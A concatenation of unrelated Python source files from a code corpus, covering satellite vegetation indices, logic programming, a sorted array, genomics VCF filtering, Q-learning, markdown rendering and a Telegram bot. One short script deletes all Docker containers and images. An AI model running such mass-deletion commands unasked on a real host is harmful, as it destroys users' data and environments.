index_order = '{}/{}_STACK_order.txt'.format(d_name, f_base)
with open(index_order, 'w') as tio:
for bi, vi in enumerate(veg_indice_list):
tio.write('{:d}: {}\n'.format(bi+1, vi))
def veg_indices(input_image, output_image, input_index, sensor, k=0.,
storage='float32', no_data=0, in_no_data=0,
chunk_size=-1, be_quiet=False, overwrite=False,
overviews=False, mask_band=None, scale_factor=1.):
"""
Computes vegetation indexes
Assumes standard band orders for available sensors.
Args:
input_image (str): The input image.
output_image (str): The output image.
input_index (str or str list): Vegetation index or list of indices to compute.
sensor (str): Input sensor. Choices are [ASTER VNIR, CBERS2, CitySphere, GeoEye1, IKONOS, Landsat, Landsat8,
Landsat thermal, MODIS, Pan, RapidEye, Sentinel2-10m (coming), Sentinel2-20m (coming),
Quickbird, WorldView2, WorldView2 PS FC].
k (Optional[float]): Resample size. Default is 0., or no resampling.
storage (Optional[str]): Storage type of ``output_image``. Default is 'float32'. Choices are
['byte', 'uint16', 'float32].
no_data (Optional[int]): The output 'no data' value for ``output_image``. Default is 0.
in_no_data (Optional[int]): The input 'no data' value. Default is 0.
chunk_size (Optional[int]): Size of image chunks. Default is -1. *chunk_size=-1 will use Numexpr
threading. This should give faster results on larger imagery.
be_quiet (Optional[bool]): Whether to print progress (False) or be quiet (True). Default is False.
overwrite (Optional[bool]): Whether to overwrite an existing ``output_image`` file. Default is False.
overviews (Optional[bool]): Whether to build pyramid overviews for ``output_image``. Default is False.
mask_band (Optional[int]): A mask band position to use. Default is None.
Examples:
>>> from mappy.features import veg_indices
>>>
>>> # Compute the NDVI for Landsat (4, 5, or 7).
>>> veg_indices('/some_image.tif', '/some_image_indice.tif', 'NDVI', 'Landsat')
>>>
>>> # Compute the NDVI, but save as Byte (0-255) storage.
>>> veg_indices('/some_image.tif', '/some_image_indice.tif', 'NDVI', 'Landsat', \
>>> storage='byte', overviews=True)
>>>
>>> # Compute the NDVI for Landsat 8.
>>> veg_indices('/some_image.tif', '/some_image_indice.tif', 'NDVI', 'Landsat8')
>>>
>>> # Compute the NDVI for Sentinel 2.
>>> veg_indices('/some_image.tif', '/some_image_indice.tif', 'NDVI', 'Sentinel2')
Returns:
None, writes to ``output_image``.
Vegetation Indices:
ARVI
Name:
Atmospheric resistant vegetation index
CNDVI
Name:
Corrected normalized difference vegetation index
Eq:
CNDVI = [(nir - Red) / (nir + Red)] * (1 - [(SWIR - SWIRmin) / (SWIRmax - SWIRmin)])
Ref:
Nemani et al. 1993.
EVI
Name:
Enhanced vegetation index
EVI2
GNDVI
Name:
Green normalized difference vegetation index
Eq:
GNDVI = (nir - Green) / (nir + Green)
IPVI
Name:
Infrared Percentage Vegetation Index
Eq:
IPVI = nir / (nir + Red)
Ref:
<NAME>. 1990. "Calculating the Vegetation Index Faster."
Remote Sensing of Environment 34: 71-73.
MNDWI
MSAVI2 -- MSAVI in veg_indice_arrayndices.py
Name:
Modified Soil Adjusted Vegetation Index
Eq:
MSAVI = ((2 * (nir + 1)) - sqrt(((2 * nir + 1)^2) - (8 * (nir - Red)))) / 2
Ref:
<NAME>., <NAME>., <NAME>., and <NAME>. 1994.
"Modified Soil Adjusted Vegetation Index (MSAVI)." Remote Sensing
of Environment 48: 119-126.
NDBI
NDBaI
Name:
Normalized difference bareness index
NDVI
Name:
Normalized Difference Vegetation Index
Eq:
NDVI = (nir - Red) / (nir + Red)
Ref:
<NAME>., <NAME>., <NAME>., and <NAME>. 1973.
"Monitoring vegetation systems in the great plains with rERTS."
Third ERTS Symposium, NASA SP-351 1: 309-317.
<NAME>., <NAME>., <NAME>., and <NAME>.
1969. "Preprocessing transformations and their effects on
multispectral recognition." in Proceedings of the Sixth
International Symposium on Remote Sensing of Environment,
University of Michigan, Ann Arbor, MI: 97-131.
ONDVI
Name:
Theta normalized difference vegetation index
Eq:
(4 / pi) * arctan(NDVI)
NDWI
Name:
Normalized difference water index or moisture index
pNDVI
Name:
Pseudo normalized difference vegetation index
Eq:
pNDVI = (Red - Green) / (Red + Green)
RBVI
SATVI
SAVI
Name:
Soil Adjusted Vegetation Index
Eq:
SAVI = ((nir - Red) / (nir + Red + L)) * (1 + L)
where, L=0.--1. (high--low vegetation cover)
Ref:
<NAME>. 1988. "A soil-adjusted vegetation index (SAVI)." Remote Sensing of
Environment 25, 295-309.
SVI (or RVI)
Name:
Simple Vegetation Index (or Ratio Vegetation Index)
Eq:
RVI = nir / Red
Ref:
Jordan, C.F. 1969. "Derivation of leaf area index from quality of
light on the forest floor." Ecology 50: 663-666.
TSAVI -- not used
Name:
Transformed Soil Adjusted Vegetation Index
Eq:
TSAVI = s(nir - s * Red - a) / (a * nir + red - a * s + X * (1 + s * s))
Ref:
<NAME>., <NAME>., and <NAME>. 1989. "TSAVI: A vegetation
index which minimizes soil brightness effects on LAI or APAR
estimation." in 12th Canadian Symposium on Remote Sensing and
IGARSS 1990, Vancouver, Canada, July 10-14.
<NAME>. and <NAME>. 1991. "Potentials and limits of vegetation
indices for LAI and APAR assessment." Remote Sensing of
Environment 35: 161-173.
TNDVI
TVI
"""
if isinstance(input_index, str):
if input_index.lower() == 'all':
_compute_as_list(input_image, output_image, sensor, k, storage, no_data,
chunk_size, overwrite, overviews)
else:
vio = VegIndices(input_image, input_index, sensor, mask_band=mask_band)
vio.run(output_image, k=k, storage=storage, no_data=no_data, in_no_data=in_no_data,
chunk_size=chunk_size, be_quiet=be_quiet, overwrite=overwrite, overviews=overviews,
scale_factor=scale_factor)
if isinstance(input_index, list):
if (len(input_index) == 1) and (input_index[0].lower() != 'all'):
vio = VegIndices(input_image, input_index[0], sensor, mask_band=mask_band)
vio.run(output_image, k=k, storage=storage, no_data=no_data, in_no_data=in_no_data,
chunk_size=chunk_size, be_quiet=be_quiet, overwrite=overwrite, overviews=overviews,
scale_factor=scale_factor)
else:
_compute_as_list(input_image, output_image, sensor, k, storage, no_data,
chunk_size, overwrite, overviews, veg_indice_list=input_index)
def _examples():
sys.exit("""\
# List vegetation index options for a sensor.
veg-indices --sensor Landsat --options
# List the expected band order for a sensor.
veg-indices --sensor Landsat --band_order
veg-indices --sensor Landsat8 --band_order
veg-indices --sensor Landsat-thermal --band_order
veg-indices --sensor Sentinel2 --band_order
veg-indices --sensor Quickbird --band_order
veg-indices --sensor RGB --band_order
# Compute NDVI for a Landsat image.
veg-indices -i /some_image.tif -o /ndvi.tif --index ndvi --sensor Landsat
# Compute NDVI for a Landsat8 image.
veg-indices -i /some_image.tif -o /ndvi.tif --index ndvi --sensor Landsat8
# Compute NDVI for a Sentinel 2 image.
veg-indices -i /some_image.tif -o /ndvi.tif --index ndvi --sensor Sentinel2
# Compute NDWI for a Landsat image and save as Byte (0-255) storage.
veg-indices -i /some_image.tif -o /ndwi.tif --index ndwi --sensor Landsat --storage byte --overviews
# Compute NDSI for a Landsat image, save as float32 storage, and set 'no data' pixels to -999.
veg-indices -i /some_image.tif -o /ndsi.tif --index ndsi --sensor Landsat --overviews --no_data -999
# Compute NDVI and SAVI for a Landsat image. The --chunk -1 parameter tells the
# system to use 'numexpr' for calculations.
#
# *Each output image will be saved as /output_ndvi.tif, /output_savi.tif AND
# a VRT multi-band image will be saved as /output_STACK.vrt. Unlike single index
# triggers, if --index is a list of more than one index, the --overviews parameter
# will only build overviews for the VRT file.
veg-indices -i /some_image.tif -o /output.tif --index ndvi savi --sensor Landsat --overviews --chunk -1
# Compute all available indices for Landsat.
veg-indices -i /some_image.tif -o /output.tif --index all --sensor Landsat
""")
def main():
parser = argparse.ArgumentParser(description='Computes spectral indices and band ratios',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-e', '--examples', dest='examples', action='store_true', help='Show usage examples and exit')
parser.add_argument('-i', '--input', dest='input', help='The input image', default=None)
parser.add_argument('-o', '--output', dest='output', help='The output image', default=None)
parser.add_argument('--index', dest='index', help='The vegetation index to compute', default=['ndvi'], nargs='+')
parser.add_argument('--sensor', dest='sensor', help='The input sensor', default='Landsat',
choices=SensorInfo().sensors)
parser.add_argument('-k', '--resample', dest='resample', help='Resample cell size', default=0., type=float)
parser.add_argument('-s', '--storage', dest='storage', help='The storage type', default='float32')
parser.add_argument('-n', '--no_data', dest='no_data', help='The output "no data" value', default=0, type=int)
parser.add_argument('-c', '--chunk', dest='chunk', help='The chunk size', default=1024, type=int)
parser.add_argument('-q', '--be_quiet', dest='be_quiet', help='Whether to be quiet', action='store_true')
parser.add_argument('--overwrite', dest='overwrite', help='Whether to overwrite an existing file',
action='store_true')
parser.add_argument('--overviews', dest='overviews', help='Whether to build pyramid overviews',
action='store_true')
parser.add_argument('--options', dest='options',
help='Whether to list the vegetation index options for the sensor, --sensor',
action='store_true')
parser.add_argument('--band_order', dest='band_order',
help='Whether to list the expected band order for the sensor, --sensor',
action='store_true')
args = parser.parse_args()
if args.options:
si = SensorInfo()
si.list_indice_options(args.sensor)
sys.exit("""\
Available indices for {}:
{}
""".format(args.sensor, ', '.join(si.sensor_indices)))
if args.band_order:
si = SensorInfo()
sys.exit(si.list_expected_band_order(args.sensor))
if args.examples:
_examples()
logger.info('\nStart date & time --- (%s)\n' % time.asctime(time.localtime(time.time())))
start_time = time.time()
veg_indices(args.input, args.output, args.index, args.sensor, k=args.resample, storage=args.storage,
no_data=args.no_data, chunk_size=args.chunk, be_quiet=args.be_quiet,
overwrite=args.overwrite, overviews=args.overviews)
logger.info('\nEnd data & time -- (%s)\nTotal processing time -- (%.2gs)\n' %
(time.asctime(time.localtime(time.time())), (time.time()-start_time)))
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3584493
|
<gh_stars>1-10
#!/usr/bin/env python
from shellcall import ShellCall
# Delete all containers
ShellCall("docker rm $(docker ps -a -q)")
# Delete all images
ShellCall("docker rmi $(docker images -q)")
|
StarcoderdataPython
|
21043
|
import pyblaze.nn.data.extensions
from .noise import NoiseDataset, LabeledNoiseDataset
from .zip import ZipDataLoader
from .transform import TransformDataset
|
StarcoderdataPython
|
189835
|
from pylps.core import *
initialise(max_time=5)
create_actions('show(_)')
create_events('handle_list(_)')
create_variables('X', 'XS')
reactive_rule(True).then(
handle_list(['a', 'b', 'c', 'd']).frm(T1, T2)
)
goal(handle_list([X]).frm(T1, T2)).requires(
show([X]).frm(T1, T2)
)
goal(handle_list([X | XS]).frm(T1, T2)).requires(
show([X]).frm(T1, T2),
handle_list(XS).frm(T1, T2)
)
execute(single_clause=False)
show_kb_log()
'''
actions show(_).
if true
then handle_list([a,b,c,d]) from T1 to T2.
handle_list([Single]) from T1 to T2 if show([Single]) from T1 to T2.
handle_list([X|Xs]) from T1 to T3 if
show([X]) from T1 to T2,
handle_list(Xs) from T2 to T3.
show([a]) 1 2
show([b]) 2 3
show([c]) 3 4
show([d]) 4 5
'''
|
StarcoderdataPython
|
1877223
|
<reponame>ChyiYaqing/chyidlTutorial
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# array_fixed_size_CURD_implement.py
# python
#
# 🎂"Here's to the crazy ones. The misfits. The rebels.
# The troublemakers. The round pegs in the square holes.
# The ones who see things differently. They're not found
# of rules. And they have no respect for the status quo.
# You can quote them, disagree with them, glority or vilify
# them. About the only thing you can't do is ignore them.
# Because they change things. They push the human race forward.
# And while some may see them as the creazy ones, we see genius.
# Because the poeple who are crazy enough to think thay can change
# the world, are the ones who do."
#
# Created by <NAME> on 02/28/19 13:50.
# Copyright © 2019. <NAME>.
# All rights reserved.
#
# Distributed under terms of the
# MIT
"""
Implement an fixed size array, support dynamic add, delete, update, read
"""
import ctypes # A foreign function library for Python
class FixedSizeArray:
# Fixed Size Array class
def __init__(self, capacity):
self.n = 0 # Count actual element (Default is 0)
self.capacity = capacity # Default Capacity
self.A = self.make_array(self.capacity)
def __len__(self):
# Return number of elements stored in array
return self.n
def __repr__(self):
# "official" string representation of an object
return ",".join(str(self.A[i]) for i in range(self.n))
def __getitem__(self, index):
# Return element at index
index = self.checkindex(index)
return self.A[index] # Retrieve from the array at index
def append(self, ele):
# Add element to correct position
if self.n == self.capacity:
return RuntimeError('fixed size Array {} is full'.format(self.n))
# finding correct position self.A[i] < ele < self.A[i+1]
if self.n == 0:
self.A[0] = ele
elif self.n == 1:
if ele < self.A[0]:
self.A[0], self.A[1] = ele, self.A[0]
else:
self.A[1] = ele
else:
corrPos = float("-inf")
for i in range(self.n-1):
if self.A[i] <= ele <= self.A[i+1]:
corrPos = i+1
if corrPos == float("-inf") and ele < self.A[0]:
for i in range(self.n-1, -1, -1):
self.A[i+1] = self.A[i]
self.A[0] = ele
else:
self.A[self.n] = ele
self.n += 1
def delete(self, idx):
# delete element in idx
idx = self.checkindex(idx)
for i in range(idx, self.n-1):
self.A[i] = self.A[i+1]
self.n -= 1
def update(self, idx, ele):
# update element in idx to ele
self.delete(idx)
self.append(ele)
def checkindex(self, idx):
if idx < 0: # Support negative numbers index
idx = self.n + idx
if not 0 <= idx < self.n:
return IndexError('idx = {} is out of bounds !'.format(idx))
return idx
def make_array(self, cap):
# Returns a array with capacity
return (cap * ctypes.py_object)()
if __name__ == '__main__':
arr = FixedSizeArray(10)
for ele in range(5, -1, -1):
arr.append(ele)
print("Print order array")
print(arr)
print("Delete element in index = {}".format(2))
arr.delete(2)
print("Print order array")
print(arr)
print("Update element in index = {}, ele = {}".format(0, 1024))
arr.update(0, 1024)
print("Print order array")
print(arr)
|
StarcoderdataPython
|
9728505
|
<reponame>wangvictor2012/liuwei<gh_stars>0
"""
Mockup classes used in unit tests.
"""
class FakeProcess(object):
def __init__(self):
self.regs = {}
def setreg(self, name, value):
self.regs[name] = value
def getreg(self, name):
return self.regs[name]
|
StarcoderdataPython
|
1792358
|
from setuptools import find_packages
from setuptools import setup
long_description = """
This will be a new type of Gherkin/BDD implementation for Pytest. It is based on the Gherkin library and Pytest framework.
"""
setup(
name="pytest-gherkin",
version="0.1",
url="https://github.com/bigbirdcode",
license="MIT License",
author="BigBirdCode",
author_email="na",
description="Gherkin/BDD implementation for Pytest",
long_description=long_description,
classifiers=[
"Development Status :: 3 - Alpha",
"Framework :: Pytest",
"Environment :: Desktop Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Development",
"Topic :: Testing",
],
packages=find_packages("src"),
package_dir={"": "src"},
python_requires=">=3.7",
install_requires=["pytest>=5.3.2", "gherkin-official>=4.1.3", "parse>1.12.0"],
extras_require={"dev": ["flake8", "pylint", "black"]},
entry_points={"pytest11": ["pytest_gherkin = pt_gh.plugin"]},
)
|
StarcoderdataPython
|
6497372
|
from .launch_params import LaunchParams, valid_param
ROLES_STUDENT = ['student', 'learner']
ROLES_INSTRUCTOR = ['instructor', 'faculty', 'staff']
class ToolBase(object):
def __init__(self, consumer_key=None, consumer_secret=None, params=None):
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
if params is None:
params = {}
if isinstance(params, LaunchParams):
self.launch_params = params
else:
self.launch_params = LaunchParams(params)
def __getattr__(self, attr):
if not valid_param(attr):
raise AttributeError(
"{} is not a valid launch param attribute".format(attr))
try:
return self.launch_params[attr]
except KeyError:
return None
def __setattr__(self, key, value):
if valid_param(key):
self.launch_params[key] = value
else:
self.__dict__[key] = value
def has_role(self, role):
return self.launch_params.get('roles') and any(
x.lower() == role.lower() for x in self.launch_params['roles'])
def is_student(self):
return any(self.has_role(x) for x in ROLES_STUDENT)
def is_instructor(self):
return any(self.has_role(x) for x in ROLES_INSTRUCTOR)
def is_launch_request(self):
msg_type = self.launch_params.get('lti_message_type')
return msg_type == 'basic-lti-launch-request'
def is_content_request(self):
msg_type = self.launch_params.get('lti_message_type')
return msg_type == 'ContentItemSelectionRequest'
def set_custom_param(self, key, val):
setattr(self, 'custom_' + key, val)
def get_custom_param(self, key):
return getattr(self, 'custom_' + key)
def set_non_spec_param(self, key, val):
self.launch_params.set_non_spec_param(key, val)
def get_non_spec_param(self, key):
return self.launch_params.get_non_spec_param(key)
def set_ext_param(self, key, val):
setattr(self, 'ext_' + key, val)
def get_ext_param(self, key):
return getattr(self, 'ext_' + key)
def to_params(self):
params = dict(self.launch_params)
# stringify any list values
for k, v in params.items():
if isinstance(v, list):
params[k] = ','.join(v)
return params
|
StarcoderdataPython
|
6539641
|
<reponame>shr-project/Scenic
from .common import scenicToWebotsPosition, scenicToWebotsRotation
|
StarcoderdataPython
|
8045015
|
#!/usr/bin/env python
'''
Copyright (c) Sentieon Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import argparse
import sys
import gzip
from operator import attrgetter
from Variant import Variant
class Variant(Variant):
def __init__(self, line):
cols = line.split("\t")
if len(cols) <= 10:
raise IndexError('Variant has less than 10 columns.')
super().__init__(line)
@property
def alt_count(self):
try:
alt = int(self.samples[0]['AD'].split(",")[1])
except KeyError:
alt = 0
return alt
def triallelic_filter(block, args):
block.sort(reverse=True, key=attrgetter("qual", "alt_count"))
output = []
if args.mode == 1:
output = block[:args.N]
else:
thresh = block[0].qual * args.N / 100
for i in range(len(block)):
if block[i].qual < thresh:
break
else:
i = len(block)
output = block[:i]
for var in output:
cols = var.line.split("\t")
filter_col = cols[6].split(";")
filter_col.remove("triallelic_site")
if len(filter_col) == 0:
cols[6] = "PASS"
else:
cols[6] = ";".join(filter_col)
print("\t".join(cols), end="\n")
def process_args():
parser = argparse.ArgumentParser(description='Process triallelic sites.')
parser.add_argument('-i', '--input', metavar='VCF',
help='Input VCF file name, required', required=True)
parser.add_argument('-m', '--mode', metavar='MODE',
help='1) Keep top N variants. '
'2) Keep variants with QUAL higher than N%% '
'of the highest. Default: 1', type=int, default=1)
parser.add_argument('-N', metavar='Parameter',
help='See --mode for more information. '
'Default: 1', type=int, default=1)
parser.add_argument('--ignore_non_pass',
help='Ignore and remove non-pass triallelic sites.',
action='store_true')
return parser.parse_args()
def main():
args = process_args()
if args.input.endswith("gz"):
VCFfile = gzip.open(args.input, 'rt')
else:
VCFfile = open(args.input)
block = []
chrom = ""
pos = 0
for line in VCFfile:
if line.startswith("#"):
print(line, end="")
else:
var = Variant(line)
if "triallelic_site" in var.filter:
if args.ignore_non_pass and len(var.filter) > 1:
continue
if block:
if var.chrom != chrom or var.pos != pos:
triallelic_filter(block, args)
block = [Variant(line)]
chrom = var.chrom
pos = var.pos
else:
block.append(Variant(line))
else:
chrom = var.chrom
pos = var.pos
block = [Variant(line)]
else:
if block:
triallelic_filter(block, args)
block = []
print(line, end="")
if block:
triallelic_filter(block, args)
if __name__ == '__main__':
sys.exit(main())
# vim: ts=4 sw=4 expandtab
|
StarcoderdataPython
|
1941813
|
<filename>TD/q_learning/simple_q_learning.py
#http://mnemstudio.org/path-finding-q-learning-tutorial.htm
#provide two different criterion for q-learning
import numpy as np
#initialize q function
q = np.matrix(np.zeros([6,6]))
# r is the tabular representation for rewards
r = np.matrix([[-1,-1,-1,-1,0,-1],
[-1,-1,-1,0,-1,100],
[-1,-1,-1,0,-1,-1],
[-1,0,0,-1,0,-1],
[0,-1,-1,0,-1,100],
[-1,0,-1,-1,0,100]])
#hyperparameter
gamma = 0.8
epsilon = 0.4
alpha = 0.1 #learning rate
#the main training loop
for episode in range(101):
#random initial state
state = np.random.randint(0,6)
while (state!=5):
possible_actions = []
possible_q = []
for action in range(6):
#loop through all actions, choose rules-allowed actions
if r[state,action] >= 0:
possible_actions.append(action)
possible_q.append(q[state,action])
#step next state, here we use epsilon-greedy algo
action = -1
if np.random.random() < epsilon:
#choose random action
action = possible_actions[np.random.randint(0,len(possible_actions))]
else:
#greedy
action = possible_actions[np.argmax(possible_q)]
#update q value
#method1
#q[state,action] = r[state,action] + gamma * q[action].max()
#method2
rs = r[state,action]
re = gamma * q[action].max()
cur_r = q[state, action]
td = rs+re-cur_r
print(f'next immediate reward is: {r[action,np.argmax(q[action])]}')
print(f'future reward is: {gamma*q[action].max()}')
print(f'current future reward is: {q[state,action]}')
#q[state,action] += alpha * [ rs + re - cur_r
#q[state,action] += alpha * (r[action,np.argmax(q[action])] + gamma * q[action].max() - q[state,action])
q[state,action] += alpha * td
#go to the next state
state = action
if episode % 10 ==0:
print('_________________________________________')
print('training episode: %d' % episode)
print(q)
for i in range(10):
print('episode: %d' %i)
#random initial state
state = np.random.randint(0,6)
print(f'robot starts at {state}')
for _ in range(20):
if state == 5:
break
action = np.argmax(q[state])
print(f'the robot goes to {action}')
state = action
|
StarcoderdataPython
|
3444500
|
<reponame>AndrewLester/2020-robot
from typing import get_type_hints
class FakeImpl:
def __init__(self, *args, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __getattribute__(self, attr):
return FakeImpl()
def __call__(self, *args, **kwargs):
return FakeImpl(*args, **kwargs)
|
StarcoderdataPython
|
375647
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth import get_user_model
admin.site.register(get_user_model(), UserAdmin)
|
StarcoderdataPython
|
5044258
|
<filename>model/contact.py<gh_stars>0
class Contact:
def __init__(self, first_name, last_name, nick, home_phone, mobile_phone, email):
self.first_name = first_name
self.last_name = last_name
self.nick = nick
self.home_phone = home_phone
self.mobile_phone = mobile_phone
self.email = email
|
StarcoderdataPython
|
1632082
|
<reponame>deepestML/Discord-S.C.U.M<gh_stars>100-1000
import time, datetime
def calculateNonce(date="now"):
if date == "now":
date = datetime.datetime.now()
unixts = time.mktime(date.timetuple())
return str((int(unixts)*1000-1420070400000)*4194304)
|
StarcoderdataPython
|
4886764
|
import sys
import re
import textwrap
import commonmark
import pygments
import pygments.lexers
import pygments.styles
import pygments.formatters
from .styler import Styler, Style
from .escapeseq import EscapeSequence, _true_color
import logging
logger = logging.getLogger('consolemd')
endl = '\n'
def debug_tag(obj, entering, match):
if entering != match:
return ''
if entering:
return u"<{}>".format(obj.t)
return u"</{}>".format(obj.t)
class Renderer:
def __init__(self, parser=None, style_name=None):
if parser is None:
parser = commonmark.Parser()
if style_name is None:
style_name = 'native'
self.parser = parser
self.style_name = style_name
self.list_level = -1
self.counters = {}
self.footnotes = []
def render(self, text, **kw):
stream = kw.get('output', sys.stdout)
self.width = kw.get('width', None)
self.soft_wrap = kw.get('soft_wrap', True)
self.soft_wrap_char = endl if self.soft_wrap else ' '
text = self.wrap_paragraphs(text)
self.styler = Styler(stream, self.style_name)
ast = self.parser.parse(text)
for obj, entering in ast.walker():
with self.styler.cm(obj, entering):
prefix = self.prefix(obj, entering)
stream.write(prefix)
logger.debug(debug_tag(obj, entering, True))
out = self.dispatch(obj, entering)
stream.write(out)
logger.debug(debug_tag(obj, entering, False))
stream.flush()
def dispatch(self, obj, entering):
try:
handler = getattr(self, obj.t)
out = handler(obj, entering)
return out
except AttributeError:
logger.error(u"unhandled ast type: {}".format(obj.t))
return ''
def wrap_paragraphs(self, text):
"""
unfortunately textwrap expects to work on paragraphs, not entire
documents. If the user has specified a width then we need to wrap
the paragraphs individually before we parse the document.
"""
if not self.width:
return text
para_edge = re.compile(r"(\n\s*\n)", re.MULTILINE)
paragraphs = para_edge.split(text)
wrapped_lines = []
for para in paragraphs:
wrapped_lines.append(
textwrap.fill(para, width=self.width)
)
return '\n'.join(wrapped_lines)
def prefix(self, obj, entering):
"""
having newlines before text blocks is problematic, this function
tries to catch those corner cases
"""
if not entering:
return ''
if obj.t == 'document':
return ''
# if our parent is the document the prefix a newline
if obj.parent.t == 'document':
# don't prefix the very first one though
if obj.parent.first_child != obj:
return endl
return ''
def document(self, obj, entering):
if entering:
return ''
else:
formatted_footnotes = []
for i, footnote in enumerate(self.footnotes):
i += 1
f = u"[{}] - {}".format(i, footnote)
formatted_footnotes.append(f)
if formatted_footnotes:
return endl + endl.join(formatted_footnotes) + endl
return ''
def paragraph(self, obj, entering):
if entering:
return ''
else:
return endl
def text(self, obj, entering):
return obj.literal
def linebreak(self, obj, entering):
return endl
def softbreak(self, obj, entering):
return self.soft_wrap_char
def thematic_break(self, obj, entering):
width = self.width if self.width else 75
return u"{}".format('—' * width) + endl
def emph(self, obj, entering):
return ''
def strong(self, obj, entering):
return ''
def heading(self, obj, entering):
if entering:
level = 1 if obj.level is None else obj.level
return u"{} ".format('#' * level)
else:
return endl
def list(self, obj, entering):
if entering:
self.list_level += 1
else:
self.list_level -= 1
if obj.list_data['type'] == 'ordered':
if entering:
# item nodes will increment this
start = obj.list_data['start'] - 1
self.counters[ tuple(obj.sourcepos[0]) ] = start
else:
del self.counters[ tuple(obj.sourcepos[0]) ]
return ''
def item(self, obj, entering):
if entering:
if obj.list_data['type'] == 'ordered':
key = tuple(obj.parent.sourcepos[0])
self.counters[key] += 1
num = self.counters[key]
bullet_char = u"{}.".format(num)
else:
bullet_char = obj.list_data.get('bullet_char') or '*' # -,+,*
text = u"{}{} ".format(' ' * self.list_level * 2, bullet_char)
eseq = self.styler.style.entering('bullet')
return self.styler.stylize(eseq, text)
return ''
def code(self, obj, entering):
# backticks
return obj.literal
def code_block(self, obj, entering):
# farm out code highlighting to pygments
# note: unfortunately you can't set your own background color
# because after the first token the color codes would get reset
try:
lang = obj.info or 'text'
lexer = pygments.lexers.get_lexer_by_name(lang)
style = Style.get_style_by_name(self.style_name)
except pygments.util.ClassNotFound: # lang is unknown to pygments
lang = 'text'
lexer = pygments.lexers.get_lexer_by_name(lang)
style = Style.get_style_by_name(self.style_name)
formatter_name = 'console16m' if _true_color else 'console'
formatter = pygments.formatters.get_formatter_by_name(formatter_name, style=style)
highlighted = u"{}{}".format(
pygments.highlight(obj.literal.encode('utf-8'), lexer, formatter).rstrip(),
EscapeSequence.full_reset_string() + endl,
)
eseq = EscapeSequence(bg="#202020")
return self.styler.stylize(eseq, highlighted)
def block_quote(self, obj, entering):
# has text children
return ''
def link(self, obj, entering):
if entering:
self.footnotes.append(obj.destination)
return ''
else:
return u"[{}]".format(len(self.footnotes))
def image(self, obj, entering):
if entering:
self.footnotes.append(obj.destination)
return '<image:'
else:
return u">[{}]".format(len(self.footnotes))
def html_inline(self, obj, entering):
if obj.literal.lower() in ['<br>', '<br/>']:
return endl
return obj.literal
def html_block(self, obj, entering):
logger.warning("ignoring html_block")
return ''
renderer = Renderer(self.parser, self.style_name)
renderer.render(obj.literal[4:-3])
return ''
|
StarcoderdataPython
|
11297943
|
import os
import asyncio
import aiohttp
from aiohttp import web
async def get_my_piblic_ip(client: aiohttp.ClientSession) -> dict:
print(client.get('https://api.ipify.org/?format=json'))
async def set_webhooks(base_url):
async with aiohttp.ClientSession() as client:
my_public_ip = await get_my_piblic_ip(client) # fixme
with open('./YOURPUBLIC.pem') as cert_file:
async with client.post(f'{base_url}/setWebhook?url={my_public_ip}', data=cert_file) as resp:
return await resp.json()
def server(base_url):
async def handle_req(req):
print(await req.json())
return web.Response(status=200)
async def index(req):
print(await req.json())
return web.Response(status=200, text='test text')
app = web.Application()
app.add_routes([
web.post(f'/', index),
web.post(f'/{base_url}/api/v1', handle_req)
])
web.run_app(app)
def main():
base_url = f'https://api.telegram.org/bot{os.environ["BOT_TOKEN"]}'
loop = asyncio.get_event_loop()
loop.run_until_complete(set_webhooks(base_url))
server(base_url)
if (__name__ == '__main__'):
main()
|
StarcoderdataPython
|
3371979
|
from datetime import datetime
from loguru import logger
from config import settings
from order.dao import ordermodel
from order.schemas.schemas_order import (
orderMessage,
orderPayload,
orderModelBrokerMessage,
orderModelCreate,
messageBaseResponse,
)
from order.api.adapters.user import get_user
from order.api.adapters.product import get_product
from order.api.adapters.publisher import publish_queue
class OrderService():
async def add_ordermodel(self, ordermodel_data):
try:
_order_message = await self._pub_message(
await ordermodel.create(
obj_in=await self._create_model_obj(ordermodel_data)
)
)
return _order_message
except Exception as e:
logger.error(f"Error in add ordermodel {e}")
raise e
@staticmethod
async def _create_model_obj(data):
try:
_user = await get_user(user_id=data.user_id)
_product = await get_product(product_code=data.product_code)
if not _user or not _product:
raise ValueError(f"User or Product not found.\n User {_user} - Product {_product}")
return orderModelCreate(
user_id=_user.user_id,
product_code=_product.product_code,
customer_fullname=_user.customer_fullname,
product_name=_product.product_name,
total_amount=_product.price
)
except Exception as e:
logger.error(f"Error in create_model_object {e}")
raise e
@staticmethod
async def _pub_message(message):
try:
_order_message = orderMessage(
order_id=message.id,
product_code=message.product_code,
customer_fullname=message.customer_fullname,
product_name=message.product_name,
total_amount=message.total_amount,
created_at=message.created_at
)
_order_payload = orderPayload(order=_order_message)
_order_broker_message = orderModelBrokerMessage(
producer="service-order",
sent_at=datetime.now(),
type="created-order",
payload=_order_payload,
)
